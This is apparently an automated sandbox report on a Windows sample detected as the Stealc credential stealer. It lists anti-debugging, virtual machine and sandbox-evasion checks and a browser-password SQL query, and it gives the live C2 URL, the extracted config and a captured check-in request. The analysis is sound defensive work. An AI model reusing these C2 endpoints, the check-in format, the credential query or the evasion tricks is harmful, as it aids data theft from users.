Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2C881 second address: E2C887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2CB07 second address: E2CBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B70904h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0D34B708F8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push ebx 0x00000028 add dl, 00000034h 0x0000002b pop edx 0x0000002c sub dh, FFFFFF93h 0x0000002f push dword ptr [ebp+122D1A03h] 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F0D34B708F8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov edx, dword ptr [ebp+122D1C8Fh] 0x00000055 call 00007F0D34B708F9h 0x0000005a ja 00007F0D34B70902h 0x00000060 push eax 0x00000061 push edi 0x00000062 pushad 0x00000063 jg 00007F0D34B708F6h 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2CBA0 second address: E2CBB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F0D344F4AB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2CBB3 second address: E2CBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2CBB7 second address: E2CBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2CBC5 second address: E2CBD3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2CBD3 second address: E2CBEE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007F0D344F4ABCh 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E219 second address: E2E21F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E21F second address: E2E24E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F0D344F4AC2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E24E second address: E2E268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0D34B70905h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54703ED second address: 54703F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54703F2 second address: 5470432 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d pushad 0x0000000e jmp 00007F0D34B70901h 0x00000013 push esi 0x00000014 pop ebx 0x00000015 popad 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F0D34B708FAh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470432 second address: 5470436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470436 second address: 547043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547043A second address: 5470440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BA1A9C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DCCABE instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_009538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00954910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00954910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0094DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0094E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0094ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00954570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00954570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094F68A FindFirstFileA,	0_2_0094F68A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0094F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00953EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00953EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_009416D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0094DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0094BE70

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00941160 GetSystemInfo,ExitProcess,

0_2_00941160

Source: file.exe, file.exe, 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2090680717.0000000001645000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009445C0 VirtualProtect ?,00000004,00000100,00000000

0_2_009445C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00959860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00959750 mov eax, dword ptr fs:[00000030h]

0_2_00959750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009578E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_009578E0

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 1216, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00959600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00959600

Source: file.exe, file.exe, 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: DProgram Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00957B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00957980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00957980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00957850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00957850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00957A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00957A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2045915798.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1216, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2045915798.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1216, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true		unknown
http://185.215.113.37/e2b1563c6670f193.php	true		unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: 0.2.file.exe.940000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0094C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00949AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00949AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00947240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00947240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00949B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00949B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00958EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00958EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_009538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00954910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00954910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0094DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0094E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0094ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00954570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00954570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094F68A FindFirstFileA,	0_2_0094F68A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0094F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00953EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00953EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_009416D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0094DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0094BE70

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 36 33 33 39 39 32 46 39 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="hwid"AE633992F9F51660493485------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="build"save------KFBAECBAEGDGDHIEHIJJ--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00944880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00944880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2090680717.0000000001615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/I~
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpW
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpd
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo?
Source: file.exe, 00000000.00000002.2090680717.0000000001628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/n

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD686F	0_2_00CD686F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C8007B	0_2_00C8007B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE2980	0_2_00CE2980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0BA07	0_2_00D0BA07
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D083F6	0_2_00D083F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFE3AB	0_2_00CFE3AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D15B68	0_2_00D15B68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB5C61	0_2_00BB5C61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5141F	0_2_00C5141F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0D5C0	0_2_00D0D5C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D035E1	0_2_00D035E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFB5DF	0_2_00BFB5DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2056B	0_2_00C2056B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CBCD12	0_2_00CBCD12
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF3E99	0_2_00BF3E99
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFFEB7	0_2_00CFFEB7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D09E54	0_2_00D09E54
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD2642	0_2_00CD2642
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC77A9	0_2_00BC77A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0EFFD	0_2_00D0EFFD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1270D	0_2_00C1270D

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 009445C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: pypkqjdw ZLIB complexity 0.9947862861570248

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00958680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00958680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00953720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00953720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\6MDZQ8MF.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
